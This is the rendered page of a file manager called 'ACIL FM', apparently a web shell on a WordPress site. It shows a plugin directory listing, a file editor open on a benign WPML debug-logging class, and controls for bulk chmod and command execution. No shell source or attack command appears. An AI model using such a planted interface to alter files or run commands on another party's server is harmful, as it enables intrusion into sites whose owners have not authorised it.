ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site BKP/wp-content/plugins/otgs-installer-plugin/fp/core
/
home
mhhtmff
www
site BKP
wp-content
plugins
otgs-installer-plugin
fp
core
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Functor
-
chmod
Open
Rename
Delete
traits
-
chmod
Open
Rename
Delete
Cast.php
497 B
chmod
View
DL
Edit
Rename
Delete
Debug.php
1.39 MB
chmod
View
DL
Edit
Rename
Delete
Either.php
5.33 MB
chmod
View
DL
Edit
Rename
Delete
Filter.php
1018 B
chmod
View
DL
Edit
Rename
Delete
Fns.php
15.22 MB
chmod
View
DL
Edit
Rename
Delete
FP.php
1.84 MB
chmod
View
DL
Edit
Rename
Delete
functions.php
6.32 MB
chmod
View
DL
Edit
Rename
Delete
Invoker.php
610 B
chmod
View
DL
Edit
Rename
Delete
Json.php
792 B
chmod
View
DL
Edit
Rename
Delete
Logic.php
5.04 MB
chmod
View
DL
Edit
Rename
Delete
Lst.php
11.38 MB
chmod
View
DL
Edit
Rename
Delete
Math.php
733 B
chmod
View
DL
Edit
Rename
Delete
Maybe.php
4.51 MB
chmod
View
DL
Edit
Rename
Delete
Obj.php
13.83 MB
chmod
View
DL
Edit
Rename
Delete
Promise.php
1.47 MB
chmod
View
DL
Edit
Rename
Delete
Relation.php
1.8 MB
chmod
View
DL
Edit
Rename
Delete
Strings.php
3.77 MB
chmod
View
DL
Edit
Rename
Delete
strings_functions.php
1.15 MB
chmod
View
DL
Edit
Rename
Delete
system.php
1.65 MB
chmod
View
DL
Edit
Rename
Delete
SystemClass.php
246 B
chmod
View
DL
Edit
Rename
Delete
Undefined.php
232 B
chmod
View
DL
Edit
Rename
Delete
Validator.php
1004 B
chmod
View
DL
Edit
Rename
Delete
Wrapper.php
941 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site BKP/wp-content/plugins/otgs-installer-plugin/fp/core/Debug.php
<?php namespace WPML\INSTALLER\FP; use WPML\Collect\Support\Traits\Macroable; /** * @method static callable|mixed inspect( mixed ...$input ) * @method static callable|mixed log( string ...$label ) * @method static callable|mixed logDump( string ...$label, mixed ...$input ) * @method static callable|mixed logPrintR( string ...$label, mixed ...$input ) * @method static callable|mixed logBacktrace( string ...$label, mixed ...$input ) */ class Debug { use Macroable; public static function init() { self::macro( 'inspect', curryN( 1, function ( $input ) { $allParameters = func_get_args(); function_exists( 'xdebug_break' ) && xdebug_break(); return $input; } ) ); self::macro( 'log', curryN( 2, function ( $string, $input ) { error_log( $string ); return $input; } ) ); self::macro( 'logDump', curryN( 2, function ( $label, $input ) { ob_start(); var_dump( $input ); $dumpInput = ob_get_clean(); error_log( $label . ': ' . $dumpInput ); return $input; } ) ); self::macro( 'logPrintR', curryN( 2, function ( $label, $input ) { error_log( $label . ': ' . print_r( $input, true ) ); return $input; } ) ); self::macro( 'logBacktrace', curryN( 2, function ( $label, $input ) { ob_start(); debug_print_backtrace(); $backtrace = ob_get_clean(); error_log( $label . ': ' . PHP_EOL . $backtrace ); return $input; } ) ); } } Debug::init();
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply